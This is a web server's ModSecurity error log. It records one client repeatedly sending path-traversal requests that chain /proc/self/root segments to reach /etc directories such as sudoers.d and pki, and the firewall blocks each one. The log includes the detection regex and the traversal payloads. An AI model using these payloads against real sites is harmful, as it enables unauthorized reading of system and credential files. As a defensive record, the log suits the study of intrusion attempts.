[Mon Mar 16 11:00:14.927539 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:56504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM7tSswJuvopo3lOhV8AAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:17.188870 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:56518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM8XbQATo66fKoS7xDxAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:18.502586 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.243.203:56526] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM8hXjF1vJNtV6CWruCQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:21.191627 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:56542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM9bABkC4fWIHEf8Hh3wAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:22.508993 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:41676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM9rysWC90G-1nBrA6pQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:23.849857 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:41690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM9xXjF1vJNtV6CWruCgAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:29.058462 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:41702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM_NSswJuvopo3lOhV9QAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:30.387264 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.243.203:33376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgM_nbQATo66fKoS7xDxgAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:32.774413 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:33390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNAP9ocpUE4ed4uDzjYwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:34.076070 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:33396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNAo6lpbStxTqkSktjfgAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:35.372181 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:33400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNA5qj1wV0Si-Okefg8AAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:36.714177 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:33412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNBHbQATo66fKoS7xDxwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:41.997432 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.243.203:33418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNCRXjF1vJNtV6CWruEQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:44.282361 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:33422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNDAlT9VtDQc7bgUyjLgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:45.607656 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:33438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNDZqj1wV0Si-Okefg8wAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:49.881690 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:33450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNEdSswJuvopo3lOhV-gAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:51.196549 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:46668] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNEwlT9VtDQc7bgUyjNwAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:00:58.897544 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:46684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNGrysWC90G-1nBrA6sAAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:02.793814 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:46686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNHtSswJuvopo3lOhWAAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:04.133553 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.228.16:46670] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgNIAlT9VtDQc7bgUyjQgAAAQQ"]
[Mon Mar 16 11:01:07.193684 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:59640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNI3bQATo66fKoS7xDzgAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:12.696073 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:59656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNKAlT9VtDQc7bgUyjSwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
